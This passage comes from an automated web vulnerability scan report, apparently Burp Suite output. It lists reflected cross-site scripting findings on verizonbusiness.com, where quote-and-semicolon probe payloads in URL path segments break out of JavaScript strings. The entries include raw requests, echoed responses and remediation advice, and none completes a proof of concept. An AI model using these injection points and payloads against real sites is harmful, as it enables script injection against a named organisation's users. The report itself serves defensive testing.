User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:39 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40758
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:40 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:39 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcese4c70";37455aea54/whitepapers/wp_parting-the-clouds-demystifying-cloud-computing-options_en_xg.pdf";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTI
...[SNIP]...

1.853. http://www.verizonbusiness.com/resources/whitepapers/wp_parting-the-clouds-demystifying-cloud-computing-options_en_xg.pdf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/wp_parting-the-clouds-demystifying-cloud-computing-options_en_xg.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 778ea"%3b427e47ae09e was submitted in the REST URL parameter 2. This input was echoed as 778ea";427e47ae09e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/whitepapers778ea"%3b427e47ae09e/wp_parting-the-clouds-demystifying-cloud-computing-options_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:05:14 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40370
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:05:14 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:05:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
ch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/whitepapers778ea";427e47ae09e/wp_parting-the-clouds-demystifying-cloud-computing-options_en_xg.pdf";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS

...[SNIP]...

1.854. http://www.verizonbusiness.com/resources/whitepapers/wp_parting-the-clouds-demystifying-cloud-computing-options_en_xg.pdf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/wp_parting-the-clouds-demystifying-cloud-computing-options_en_xg.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa942'%3bd7fa19e8fe3 was submitted in the REST URL parameter 2. This input was echoed as aa942';d7fa19e8fe3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/whitepapersaa942'%3bd7fa19e8fe3/wp_parting-the-clouds-demystifying-cloud-computing-options_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:05:20 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40372
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:05:20 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:05:20 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources/whitepapersaa942';d7fa19e8fe3/wp_parting-the-clouds-demystifying-cloud-computing-options_en_xg.pdf'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.855. http://www.verizonbusiness.com/resources/whitepapers/wp_parting-the-clouds-demystifying-cloud-computing-options_en_xg.pdf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/wp_parting-the-clouds-demystifying-cloud-computing-options_en_xg.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 37b20'%3b998f6ddede4 was submitted in the REST URL parameter 3. This input was echoed as 37b20';998f6ddede4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/whitepapers/wp_parting-the-clouds-demystifying-cloud-computing-options_en_xg.pdf37b20'%3b998f6ddede4 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:05:33 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40370
Date: Wed, 17 Nov 2010 00:05:33 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:05:33 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/whitepapers/wp_parting-the-clouds-demystifying-cloud-computing-options_en_xg.pdf37b20';998f6ddede4'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.856. http://www.verizonbusiness.com/resources/whitepapers/wp_parting-the-clouds-demystifying-cloud-computing-options_en_xg.pdf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/wp_parting-the-clouds-demystifying-cloud-computing-options_en_xg.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f8ca"%3b03e816d78eb was submitted in the REST URL parameter 3. This input was echoed as 1f8ca";03e816d78eb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/whitepapers/wp_parting-the-clouds-demystifying-cloud-computing-options_en_xg.pdf1f8ca"%3b03e816d78eb HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:05:26 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40370
Date: Wed, 17 Nov 2010 00:05:26 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:05:26 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/whitepapers/wp_parting-the-clouds-demystifying-cloud-computing-options_en_xg.pdf1f8ca";03e816d78eb";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.857. http://www.verizonbusiness.com/resources/whitepapers/wp_verizon-incident-sharing-metrics-framework_en_xg.pdf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/wp_verizon-incident-sharing-metrics-framework_en_xg.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68fc9'%3bf7e1a244bc was submitted in the REST URL parameter 1. This input was echoed as 68fc9';f7e1a244bc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources68fc9'%3bf7e1a244bc/whitepapers/wp_verizon-incident-sharing-metrics-framework_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:17:49 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40732
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:17:49 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:17:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources68fc9';f7e1a244bc/whitepapers/wp_verizon-incident-sharing-metrics-framework_en_xg.pdf'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.858. http://www.verizonbusiness.com/resources/whitepapers/wp_verizon-incident-sharing-metrics-framework_en_xg.pdf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/wp_verizon-incident-sharing-metrics-framework_en_xg.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e754"%3ba7a0d234bfa was submitted in the REST URL parameter 1. This input was echoed as 4e754";a7a0d234bfa in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources4e754"%3ba7a0d234bfa/whitepapers/wp_verizon-incident-sharing-metrics-framework_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:17:36 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40734
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:17:36 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:17:36 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources4e754";a7a0d234bfa/whitepapers/wp_verizon-incident-sharing-metrics-framework_en_xg.pdf";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
h
...[SNIP]...

1.859. http://www.verizonbusiness.com/resources/whitepapers/wp_verizon-incident-sharing-metrics-framework_en_xg.pdf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/wp_verizon-incident-sharing-metrics-framework_en_xg.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25ebd"%3b0f6f0c37f5 was submitted in the REST URL parameter 2. This input was echoed as 25ebd";0f6f0c37f5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/whitepapers25ebd"%3b0f6f0c37f5/wp_verizon-incident-sharing-metrics-framework_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:17:57 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40342
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:17:57 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:17:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
ch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/whitepapers25ebd";0f6f0c37f5/wp_verizon-incident-sharing-metrics-framework_en_xg.pdf";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//F
...[SNIP]...

1.860. http://www.verizonbusiness.com/resources/whitepapers/wp_verizon-incident-sharing-metrics-framework_en_xg.pdf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/wp_verizon-incident-sharing-metrics-framework_en_xg.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c5fa'%3b0fd002063 was submitted in the REST URL parameter 2. This input was echoed as 9c5fa';0fd002063 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/whitepapers9c5fa'%3b0fd002063/wp_verizon-incident-sharing-metrics-framework_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:18:04 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40340
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:18:04 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:18:04 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/whitepapers9c5fa';0fd002063/wp_verizon-incident-sharing-metrics-framework_en_xg.pdf'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.861. http://www.verizonbusiness.com/resources/whitepapers/wp_verizon-incident-sharing-metrics-framework_en_xg.pdf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/wp_verizon-incident-sharing-metrics-framework_en_xg.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a84fb'%3b421489f7668 was submitted in the REST URL parameter 3. This input was echoed as a84fb';421489f7668 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/whitepapers/wp_verizon-incident-sharing-metrics-framework_en_xg.pdfa84fb'%3b421489f7668 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:18:22 GMT
Content-Type: text/html
Content-Length: 40344
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:18:22 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:18:22 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/whitepapers/wp_verizon-incident-sharing-metrics-framework_en_xg.pdfa84fb';421489f7668'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.862. http://www.verizonbusiness.com/resources/whitepapers/wp_verizon-incident-sharing-metrics-framework_en_xg.pdf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/whitepapers/wp_verizon-incident-sharing-metrics-framework_en_xg.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18115"%3b62ac14c8555 was submitted in the REST URL parameter 3. This input was echoed as 18115";62ac14c8555 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/whitepapers/wp_verizon-incident-sharing-metrics-framework_en_xg.pdf18115"%3b62ac14c8555 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:18:13 GMT
Content-Type: text/html
Content-Length: 40344
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:18:13 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:18:13 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/whitepapers/wp_verizon-incident-sharing-metrics-framework_en_xg.pdf18115";62ac14c8555";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.863. http://www.verizonbusiness.com/se/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /se/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25814"%3b61e08b5702e was submitted in the REST URL parameter 1. This input was echoed as 25814";61e08b5702e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /se25814"%3b61e08b5702e/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:58:27 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40604
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:58:27 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:58:27 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
}
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/se25814";61e08b5702e/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.864. http://www.verizonbusiness.com/se/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /se/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cf096'%3b3131f4d27f6 was submitted in the REST URL parameter 1. This input was echoed as cf096';3131f4d27f6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /secf096'%3b3131f4d27f6/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
